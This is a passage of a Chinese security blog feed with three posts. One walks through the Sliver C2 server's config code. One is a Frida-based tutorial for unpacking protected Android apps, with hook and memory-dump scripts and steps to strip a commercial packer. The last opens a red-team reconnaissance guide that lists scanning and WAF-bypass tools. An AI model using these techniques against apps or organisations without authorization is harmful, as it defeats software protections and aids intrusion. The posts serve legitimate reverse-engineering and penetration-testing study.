class="line">}</span><br></pre></td></tr></table></figure><p>GetServerConfigPath函数就是读取<code>~/.sliver/config/server.json</code></p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">getDefaultServerConfig</span><span class="params">()</span></span> *ServerConfig {</span><br><span class="line"><span class="keyword">return</span> &ServerConfig{</span><br><span class="line">DaemonMode: <span class="literal">false</span>,</span><br><span class="line">DaemonConfig: &DaemonConfig{</span><br><span class="line">Host: <span class="string">""</span>,</span><br><span class="line">Port: <span class="number">31337</span>,</span><br><span class="line">},</span><br><span class="line">Logs: &LogConfig{</span><br><span class="line">Level: <span class="type">int</span>(logrus.InfoLevel),</span><br><span class="line">GRPCUnaryPayloads: <span class="literal">false</span>,</span><br><span class="line">GRPCStreamPayloads: <span class="literal">false</span>,</span><br><span class="line">},</span><br><span class="line">CC: <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">string</span>{},</span><br><span class="line">CXX: <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">string</span>{},</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>getDefaultServerConfig函数是返回一个默认的config内容</p><p><code>serverConfig := configs.GetServerConfig()</code>最后执行的结果就是获取<code>~/.sliver/config/server.json</code>的内容给到变量serverConfig<br>这里可以看下默认的config内容的样子</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">└─$ <span class="built_in">cat</span> ~/.sliver/configs/server.json </span><br><span class="line">{</span><br><span class="line"> <span class="string">"daemon_mode"</span>: <span class="literal">false</span>,</span><br><span class="line"> <span class="string">"daemon"</span>: {</span><br><span class="line"> <span class="string">"host"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"port"</span>: 31337,</span><br><span class="line"> <span class="string">"tailscale"</span>: <span class="literal">false</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"logs"</span>: {</span><br><span class="line"> <span class="string">"level"</span>: 4,</span><br><span class="line"> <span class="string">"grpc_unary_payloads"</span>: <span class="literal">false</span>,</span><br><span class="line"> <span class="string">"grpc_stream_payloads"</span>: <span class="literal">false</span>,</span><br><span class="line"> <span class="string">"tls_key_logger"</span>: <span class="literal">false</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"watch_tower"</span>: null,</span><br><span class="line"> <span class="string">"go_proxy"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"cc"</span>: {},</span><br><span class="line"> <span class="string">"cxx"</span>: {}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>接着代码是</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">listenerJobs, err := db.ListenerJobs()</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">err = StartPersistentJobs(listenerJobs)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>意思是获取数据库中保存的监听任务,也就是说,就算服务down了,重启自动就从数据库读取任务继续运行,或者说如果忘记结束job,这个job就一直跑着</p><p>然后的代码是</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> serverConfig.DaemonMode {</span><br><span class="line">daemon.Start(daemon.BlankHost, daemon.BlankPort, serverConfig.DaemonConfig.Tailscale)</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">os.Args = os.Args[:<span class="number">1</span>] <span class="comment">// Hide cli from grumble console</span></span><br><span class="line">console.Start()</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>查看服务配置文件是否配置守护进程,也就是配成service,如果有配置成守护进程,就监听端口可以进行多人协同。</p><h2 id="database-json"><a href="#database-json" class="headerlink" title="database.json"></a>database.json</h2><p>至于数据库</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> db</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">"gorm.io/gorm"</span></span><br><span class="line">)</span><br><span class="line"><span class="comment">// Client - Database Client</span></span><br><span class="line"><span class="keyword">var</span> Client = newDBClient()</span><br><span class="line"><span class="comment">// Session - Database session</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">Session</span><span class="params">()</span></span> *gorm.DB {</span><br><span class="line"><span class="keyword">return</span> Client.Session(&gorm.Session{</span><br><span class="line">FullSaveAssociations: <span class="literal">true</span>,</span><br><span class="line">})</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>可以看到有一个导出的Client和Session()</p><p>看看生成这个Client的newDBClient()</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// newDBClient - Initialize the db client</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">newDBClient</span><span class="params">()</span></span> *gorm.DB {</span><br><span class="line">dbConfig := configs.GetDatabaseConfig()</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> dbClient *gorm.DB</span><br><span class="line"><span class="keyword">switch</span> dbConfig.Dialect {</span><br><span class="line"><span class="keyword">case</span> configs.Sqlite:</span><br><span class="line">dbClient = sqliteClient(dbConfig)</span><br><span class="line"><span class="keyword">case</span> configs.Postgres:</span><br><span class="line">dbClient = postgresClient(dbConfig)</span><br><span class="line"><span class="keyword">case</span> configs.MySQL:</span><br><span class="line">dbClient = mySQLClient(dbConfig)</span><br><span class="line"><span class="keyword">default</span>:</span><br><span class="line"><span class="built_in">panic</span>(fmt.Sprintf(<span class="string">"Unknown DB Dialect: '%s'"</span>, dbConfig.Dialect))</span><br><span class="line">}</span><br><span class="line">.....</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>首先从dbConfig := configs.GetDatabaseConfig()获取配置文件<br>然后根据配置文件去连接数据库</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// GetDatabaseConfig - Get config value</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">GetDatabaseConfig</span><span class="params">()</span></span> *DatabaseConfig {</span><br><span class="line">configPath := GetDatabaseConfigPath()</span><br><span class="line">config := getDefaultDatabaseConfig()</span><br><span class="line">......</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>和前面server.json的函数相似<br>不过<code>GetDatabaseConfigPath()</code>读取的是`~/.sliver/config/database.json</p><p>看一下默认的内容</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">└─$ <span class="built_in">cat</span> ~/.sliver/configs/database.json </span><br><span class="line">{</span><br><span class="line"> <span class="string">"dialect"</span>: <span class="string">"sqlite3"</span>,</span><br><span class="line"> <span class="string">"database"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"username"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"password"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"host"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"port"</span>: 0,</span><br><span class="line"> <span class="string">"params"</span>: null,</span><br><span class="line"> <span class="string">"max_idle_conns"</span>: 10,</span><br><span class="line"> <span class="string">"max_open_conns"</span>: 100,</span><br><span class="line"> <span class="string">"log_level"</span>: <span class="string">"warn"</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>欢迎来关注我的公众号 GEEK-DREAM<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/imgqrcode_for_gh_5a1da2141918_258.jpg"></p>]]></content>
<categories>
<category> 代码研究 </category>
</categories>
<tags>
<tag> sliver-port </tag>
<tag> C2 </tag>
<tag> Cobra </tag>
</tags>
</entry>
<entry>
<title>Android脱壳</title>
<link href="/2024/03/10/Android%E8%84%B1%E5%A3%B3/"/>
<url>/2024/03/10/Android%E8%84%B1%E5%A3%B3/</url>
<content type="html"><![CDATA[<h1 id="Android脱壳"><a href="#Android脱壳" class="headerlink" title="Android脱壳"></a>Android脱壳</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1.简介</h2><p>以frida工具为基础,整理加密的Android应用脱壳技术,以及简单地修复方法。</p><p><strong>WEB系统</strong>:代码主要运行在后端服务器</p><p><strong>安卓APP</strong>:客户端和后端服务器均运行代码</p><p>故想要对APP客户端进行完整的分析,则需要对其进行脱壳,获得源码。</p><h2 id="2-脱壳思路"><a href="#2-脱壳思路" class="headerlink" title="2.脱壳思路"></a>2.脱壳思路</h2><ul><li>HOOK删除方法(获得的类最为准确)</li><li>Dump内存中的类(获得的类较为精准)</li><li>HOOK <code>ClassLinker</code> 的 <code>DefineClass</code> 方法(获得的类包含了非目标app的类)</li></ul><h3 id="2-1HOOK删除方法"><a href="#2-1HOOK删除方法" class="headerlink" title="2.1HOOK删除方法"></a>2.1HOOK删除方法</h3><p>加壳APP运行前会将apk解密运行后删除,故捕获被删除的文件即可获得未加密的apk</p><p>安卓中删除方法有<code>java.io.File</code>的<code>delete</code>方法和native层的<code>unlink</code></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//delete.js</span></span><br><span class="line"><span class="comment">//HOOK delete方法,不执行删除,仅仅获取被删除文件的路径并打印在日志里</span></span><br><span class="line"><span class="title class_">Java</span>.<span class="title function_">perform</span>(<span class="keyword">function</span>(<span class="params"></span>){</span><br><span class="line"> <span class="keyword">var</span> f = <span class="title class_">Java</span>.<span class="title function_">use</span>(<span class="string">"java.io.File"</span>);</span><br><span class="line"> f.<span class="property">delete</span>.<span class="property">implementation</span>=<span class="keyword">function</span>(<span class="params"></span>){</span><br><span class="line"> <span class="keyword">var</span> path = <span class="variable language_">this</span>.<span class="title function_">getAbsolutePath</span>();</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[+] Delete catached => <span class="subst">${path}</span>`</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="comment">//frida -U -l ./delete.js -f com.xxx.xxx</span></span><br><span class="line"><span class="comment">//com.xxx.xxx为app包名</span></span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310101102247.png" alt="image-20240310101102247"></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//unlink.js</span></span><br><span class="line"><span class="comment">//HOOK native层 unlink方法,使用Interceptor.replace替换unlink方法,不执行删除,仅仅获取被删除文件的路径并打印在日志里</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> unlinkPtr = <span class="title class_">Module</span>.<span class="title function_">findExportByName</span>(<span class="literal">null</span>,<span class="string">"unlink"</span>);</span><br><span class="line"><span class="title class_">Interceptor</span>.<span class="title function_">replace</span>(unlinkPtr,<span class="keyword">new</span> <span class="title class_">NativeCallback</span>(<span class="keyword">function</span>(<span class="params">path</span>){</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[+]unlink:<span class="subst">${path.readCString()}</span>`</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">},<span class="string">'int'</span>,[<span class="string">'pointer'</span>]));</span><br><span class="line"></span><br><span class="line"><span class="comment">//frida -U -l ./unlink.js -f com.xxx.xxx</span></span><br><span class="line"><span class="comment">//com.xxx.xxx为app包名</span></span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310101033577.png" alt="image-20240310101033577"></p><h3 id="2-2Dump内存中的类"><a href="#2-2Dump内存中的类" class="headerlink" title="2.2Dump内存中的类"></a>2.2Dump内存中的类</h3><p>对加载到内存中的类进行捕获。</p><ul><li>自动化工具(<a href="https://github.com/hluwa/frida-dexdump">hluwa/frida-dexdump)</a></li><li>手动dump</li></ul><h4 id="2-2-1自动化工具使用"><a href="#2-2-1自动化工具使用" class="headerlink" title="2.2.1自动化工具使用"></a>2.2.1自动化工具使用</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//前置需要安装frida</span><br><span class="line">//安装方法为pip3 install frida && pip3 install frida-tools</span><br><span class="line">pip3 install frida-dexdump</span><br><span class="line">//com.xxx.xxx为目标app包名</span><br><span class="line">frida-dexdump -U -f com.xxx.xxx</span><br></pre></td></tr></table></figure><h4 id="2-2-2手动dump"><a href="#2-2-2手动dump" class="headerlink" title="2.2.2手动dump"></a>2.2.2手动dump</h4><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">adb shell</span><br><span class="line">//进入adb shell,使用命令找到运行app的pid,其中<span class="string">"xxx"</span>是指的APP包名</span><br><span class="line"><span class="comment"># ps -A | grep -i "xxx"</span></span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310095235660.png" alt="image-20240310095235660"></p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//根据找到的pid寻找maps中的dex文件</span><br><span class="line"><span class="comment"># cat /proc/{pid}/maps | grep -i "dex"</span></span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310101346798.png" alt="image-20240310101346798"></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//dump.js</span></span><br><span class="line"><span class="comment">//硬编码对应的地址,不要关闭app,使用frida直接附加上去获取目标apk</span></span><br><span class="line"><span class="comment">//var starAddress = ptr(0x6eb16cb000);</span></span><br><span class="line"><span class="comment">//var endAddress = ptr(0x6eb32da000);</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> starAddress = <span class="title function_">ptr</span>(<span class="number">0x6eb16cb000</span>);</span><br><span class="line"><span class="keyword">var</span> endAddress = <span class="title function_">ptr</span>(<span class="number">0x6eb32da000</span>);</span><br><span class="line"><span class="keyword">var</span> size = endAddress.<span class="title function_">sub</span>(starAddress);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[+] Dumping memory region <span class="subst">${starAddress}</span> : <span class="subst">${endAddress}</span>`</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> buffer = <span class="title class_">Memory</span>.<span class="title function_">readByteArray</span>(starAddress,<span class="built_in">parseInt</span>(size,<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> filePath = <span class="string">"/data/local/tmp/"</span>+starAddress+<span class="string">"_dump.dex"</span>;</span><br><span class="line"><span class="keyword">var</span> fileHande = <span class="keyword">new</span> <span class="title class_">File</span>(filePath,<span class="string">"wb"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(fileHande && fileHande!=<span class="literal">null</span>){</span><br><span class="line"> fileHande.<span class="title function_">write</span>(buffer);</span><br><span class="line"> fileHande.<span class="title function_">flush</span>();</span><br><span class="line"> fileHande.<span class="title function_">close</span>();</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[*] File successfully dumped at <span class="subst">${filePath}</span>`</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">//frida-ps -Ua 查看目标app进程名</span></span><br><span class="line"><span class="comment">//frida -U -l ./dump.js 目标app进程名</span></span><br><span class="line"><span class="comment">//此处因为硬编码了地址,重新运行地址会变</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//结果在/data/local/tmp/ 找 _dump.dex结尾的</span></span><br></pre></td></tr></table></figure><h3 id="2-3HOOK-ClassLinker-的-DefineClass-方法"><a href="#2-3HOOK-ClassLinker-的-DefineClass-方法" class="headerlink" title="2.3HOOK ClassLinker 的 DefineClass 方法"></a>2.3HOOK <code>ClassLinker</code> 的 <code>DefineClass</code> 方法</h3><p>使用已有的frida脚本项目对目标进行dump</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/lasting-yang/frida_dump.git</span><br><span class="line">cd frida_dump</span><br><span class="line">frida -U -l dump_dex.js -f com.xxx.xxx</span><br><span class="line">//com.xxx.xxx为目标包名</span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310101820442.png" alt="image-20240310101820442"></p><h2 id="3-简单修复"><a href="#3-简单修复" class="headerlink" title="3.简单修复"></a>3.简单修复</h2><p>修复工具-MT管理器</p><h3 id="3-1满足静态分析工具(步骤做完即可用jd或者jadx进行分析)"><a href="#3-1满足静态分析工具(步骤做完即可用jd或者jadx进行分析)" class="headerlink" title="3.1满足静态分析工具(步骤做完即可用jd或者jadx进行分析)"></a>3.1满足静态分析工具(步骤做完即可用jd或者jadx进行分析)</h3><p>对加壳的apk内部的classes.dex进行重命名,并且解压到左边脱壳的部分</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310102348374.png" alt="image-20240310102348374"></p><p>全选所有的dex文件进行dex修复</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310102117343.png" alt="image-20240310102117343"></p><p>批量进行重命名,并将第一个classes1.dex更名为classes.dex,满足正常的dex命名规则</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310102616047.png" alt="image-20240310102616047"></p><p>将命名好的dex文件放回apk内</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310102844877.png" alt="image-20240310102844877"></p><p>将app的dex重新划分</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310103042616.png" alt="image-20240310103042616"></p><h3 id="3-2-去除so层"><a href="#3-2-去除so层" class="headerlink" title="3.2 去除so层"></a>3.2 去除so层</h3><p>此处以数字壳 jiagu 为例(旧版可用,新版不一定行)</p><p>将libjiagu.so 和 libjiagu_x86.so改为libxxxxx.so libxxxxx_x86.so</p><p>jiagu有五个字母,xxxxx可改为任意字符</p><p>此处用libxxxxx.so</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310103950120.png" alt="image-20240310103950120"></p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310104033222.png" alt="image-20240310104033222"></p><p>将so文件里的所有jiagu都改为xxxxx</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310104407472.png" alt="image-20240310104407472"></p><p>如果需要正常运行,还需要考虑签名校验,后续可采用frida hook内部签名校验方法进行绕过。</p><p>参考:</p><p><a href="https://www.youtube.com/watch?v=PLX8_z0EmGw">How to Unpack Protected Android APK with Frida (youtube.com)</a></p><p><a href="https://www.youtube.com/watch?v=FeJuxRQUVnU">https://www.youtube.com/watch?v=FeJuxRQUVnU</a></p><p><a href="https://github.com/lasting-yang/frida_dump">https://github.com/lasting-yang/frida_dump</a></p>]]></content>
<categories>
<category> 安卓 </category>
</categories>
<tags>
<tag> 脱壳 </tag>
<tag> 逆向 </tag>
<tag> frida </tag>
</tags>
</entry>
<entry>
<title>红蓝对抗-外围打点</title>
<link href="/2023/11/19/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97-%E5%A4%96%E5%9B%B4%E6%89%93%E7%82%B9/"/>
<url>/2023/11/19/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97-%E5%A4%96%E5%9B%B4%E6%89%93%E7%82%B9/</url>
<content type="html"><![CDATA[<h1 id="红蓝对抗-外围打点"><a href="#红蓝对抗-外围打点" class="headerlink" title="红蓝对抗-外围打点"></a>红蓝对抗-外围打点</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1.简介</h2><p>整理在各类比赛中进行外围打点的思路和工具。</p><h2 id="2-信息收集"><a href="#2-信息收集" class="headerlink" title="2.信息收集"></a>2.信息收集</h2><p>从三个点入手,分别为<strong>网络架构</strong>、<strong>组织架构</strong>和<strong>泄露信息</strong>。</p><h3 id="网络架构"><a href="#网络架构" class="headerlink" title="网络架构"></a>网络架构</h3><ul><li>域名</li></ul><p>互联网搜索引擎、站内搜索、企查查、备案信息+子域名</p><hr><p><strong>搜索引擎</strong>:</p><p>google</p><p>baidu</p><p><strong>网络测绘</strong>:</p><p>fofa</p><p>hunter</p><p><a href="https://www.secxxx.com/Tool/">secxxx.com大佬的工具</a></p><p><strong>企业信息</strong>:</p><p>qcc</p><p>aiqicha</p><p><strong>子域名爆破工具</strong>:</p><p><a href="https://github.com/projectdiscovery/subfinder">projectdiscovery/subfinder: Fast passive subdomain enumeration tool. (github.com)</a></p><p><a href="https://github.com/knownsec/ksubdomain">knownsec/ksubdomain: 无状态子域名爆破工具 (github.com)</a></p><p><a href="https://github.com/shmilylty/OneForAll">shmilylty/OneForAll: OneForAll是一款功能强大的子域收集工具 (github.com)</a></p><ul><li>端口</li></ul><p><a href="https://github.com/nmap/nmap">nmap/nmap: Nmap - the Network Mapper. Github mirror of official SVN repository.</a></p><p>(nmap配合<a href="https://github.com/scipag/vulscan">scipag/vulscan: Advanced vulnerability scanning with Nmap NSE (github.com)</a>可扫漏洞)</p><p><a href="https://github.com/redtoolskobe/scaninfo">redtoolskobe/scaninfo: fast scan for redtools (github.com)</a></p><p><a href="https://github.com/robertdavidgraham/masscan">robertdavidgraham/masscan: TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes. (github.com)</a></p><p><a href="https://github.com/XinRoom/go-portScan">XinRoom/go-portScan: High-performance port scanner. 高性能端口扫描器. syn scanner (github.com)</a></p><p>御剑</p><ul><li>旁站</li></ul><p>互联网搜索引擎、fofa指纹搜索</p><ul><li>小程序以及app</li></ul><p>通过微信搜索目标单位,对小程序和app抓包获取</p><ul><li>目录爆破</li></ul><p>dirsearch</p><p><strong>综合信息收集工具</strong></p><p>单URL目标精细收集</p><p><a href="https://github.com/kracer127/SiteScan">kracer127/SiteScan: 专注一站化解决渗透测试的信息收集任务,功能包括域名ip历史解析、nmap常见端口爆破、子域名信息收集、旁站信息收集、whois信息收集、网站架构分析、cms解析、备案信息收集、CDN信息解析、是否存在waf检测、后台寻找以及生成检测结果html报告表。 (github.com)</a></p><p><a href="https://github.com/xzajyjs/ThunderSearch">xzajyjs/ThunderSearch: 【支持Fofa、Shodan、Hunter、Zoomeye、Quake网络空间搜索引擎】闪电搜索器;GUI图形化(Mac/Windows)渗透测试信息搜集工具;资产搜集引擎;hw红队工具hvv (github.com)</a></p><p><a href="https://github.com/pingc0y/URLFinder">pingc0y/URLFinder: 一款快速、全面、易用的页面信息提取工具,可快速发现和提取页面中的JS、URL和敏感信息。 (github.com)</a></p><p><a href="https://github.com/Ekultek/WhatWaf">Ekultek/WhatWaf: Detect and bypass web application firewalls and protection systems (github.com)</a></p><p><a href="https://github.com/TideSec/TideFinger">https://github.com/TideSec/TideFinger</a>)</p><p><a href="https://github.com/Ekultek/WhatWaf">Ekultek/WhatWaf: Detect and bypass web application firewalls and protection systems (github.com)</a></p><p>多目标探测</p><p><a href="https://github.com/redtoolskobe/scaninfo">redtoolskobe/scaninfo: fast scan for redtools (github.com)</a></p><p><a href="https://github.com/EASY233/Finger">EASY233/Finger: 一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具 (github.com)</a></p><h3 id="组织架构"><a href="#组织架构" class="headerlink" title="组织架构"></a>组织架构</h3><p>分公司、子公司、供应链、人员信息</p><p>qcc</p><p>chinaz</p><p><a href="https://github.com/wgpsec/ENScan_GO">wgpsec/ENScan_GO: 一款基于各大企业信息API的工具,解决在遇到的各种针对国内企业信息收集难题。一键收集控股公司ICP备案、APP、小程序、微信公众号等信息聚合导出。 (github.com)</a><a href="https://github.com/laramies/theHarvester">laramies/theHarvester: E-mails, subdomains and names Harvester - OSINT (github.com)</a></p><h3 id="泄露信息"><a href="#泄露信息" class="headerlink" title="泄露信息"></a>泄露信息</h3><p>秘钥、手册、拓扑、源码、系统名称、用户名</p><p>百度网盘、阿里云盘</p><p>百度文库、语雀、豆瓣</p><p>github、gitee</p><h2 id="3-扫描工具"><a href="#3-扫描工具" class="headerlink" title="3.扫描工具"></a>3.扫描工具</h2><p><a href="https://github.com/chushuai/wscan">chushuai/wscan: 一款开源的安全评估工具支持常见的 web 安全问题扫描和自定义 POC。此外,该工具还具备机器学习的漏洞检测和自动化测试功能。 (github.com)</a></p><p><a href="https://github.com/sullo/nikto">sullo/nikto: Nikto web server scanner (github.com)</a></p><p><a href="https://github.com/d3ckx1/Fvuln">d3ckx1/Fvuln: F-vuln(全称:Find-Vulnerability)是为了自己工作方便专门编写的一款自动化工具,主要适用于日常安全服务、渗透测试人员和RedTeam红队人员,它集合的功能包括:存活IP探测、开放端口探测、web服务探测、web漏洞扫描、smb爆破、ssh爆破、ftp爆破、mssql爆破等其他数据库爆破工作以及大量web漏洞检测模块。 (github.com)</a></p><p><a href="https://github.com/lcvvvv/kscan">lcvvvv/kscan: Kscan是一款纯go开发的全方位扫描器,具备端口扫描、协议检测、指纹识别,暴力破解等功能。支持协议1200+,协议指纹10000+,应用指纹20000+,暴力破解协议10余种。 (github.com)</a></p><p><a href="https://github.com/givemefivw/SecurityServiceBox">givemefivw/SecurityServiceBox: 一个既可以满足安服仔日常渗透工作也可以批量刷洞的工具盒子。集合了常见的域名收集、目录扫描、ip扫描、指纹扫描、PoC验证等常用工具,方便安服仔快速展开渗透测试 (github.com)</a></p><p><a href="https://github.com/veo/vscan">veo/vscan: 开源、轻量、快速、跨平台 的网站漏洞扫描工具,帮助您快速检测网站安全隐患。功能 端口扫描(port scan) 指纹识别(fingerprint) 漏洞检测(nday check) 智能爆破 (admin brute) 敏感文件扫描(file fuzz) (github.com)</a></p><p><a href="https://github.com/hktalent/scan4all">hktalent/scan4all: Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome 